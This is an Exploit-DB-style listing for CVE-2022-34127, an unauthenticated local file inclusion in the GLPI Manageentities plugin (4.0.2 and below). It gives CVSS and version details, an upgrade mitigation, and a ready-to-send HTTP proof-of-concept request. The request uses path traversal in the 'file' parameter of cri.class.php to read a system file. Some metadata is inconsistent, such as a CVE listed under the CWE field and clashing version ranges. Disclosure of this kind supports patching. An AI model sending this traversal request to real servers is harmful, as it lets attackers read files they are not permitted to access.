GLPI 4.0.2 - Unauthenticated Local File Inclusion on Manageentities plugin

vendor:

Manageentities

by:

Nuri Çilengir

7.5

CVSS

HIGH

Unauthenticated Local File Inclusion

CWE

Product Name: Manageentities

Affected Version From: GLPI Manageentities < 4.0.2

Affected Version To: GLPI Manageentities >= 4.0.3

Patch Exists: YES

Related CWE: CVE-2022-34127

CPE: a:glpi-project:manageentities

Metasploit:

Other Scripts:

Platforms Tested: Ubuntu 22.04

2022

GLPI 4.0.2 – Unauthenticated Local File Inclusion on Manageentities plugin

The GLPI Manageentities plugin version 4.0.2 and below is vulnerable to unauthenticated local file inclusion. An attacker can exploit this vulnerability by sending a specially crafted request to the `cri.class.php` file, allowing them to access arbitrary files on the system.

Mitigation:

Upgrade to a patched version of the GLPI Manageentities plugin (version 4.0.3 or above).

Source

Exploit-DB raw data:

# ADVISORY INFORMATION
# Exploit Title: GLPI 4.0.2 - Unauthenticated Local File Inclusion on Manageentities plugin
# Date of found: 11 Jun 2022
# Application: GLPI Manageentities < 4.0.2
# Author: Nuri Çilengir 
# Vendor Homepage: https://glpi-project.org/
# Software Link: https://github.com/InfotelGLPI/manageentities
# Advisory: https://pentest.blog/advisory-glpi-service-management-software-sql-injection-remote-code-execution-and-local-file-inclusion/
# Tested on: Ubuntu 22.04
# CVE : CVE-2022-34127

# PoC
GET /marketplace/manageentities/inc/cri.class.php?&file=../../\\..\\..\\..\\..\\..\\..\\..\\Windows\\System32\\drivers\\etc\\hosts&seefile=1 HTTP/1.1
Host: 192.168.56.113
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:100.0) Gecko/20100101 Firefox/100.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1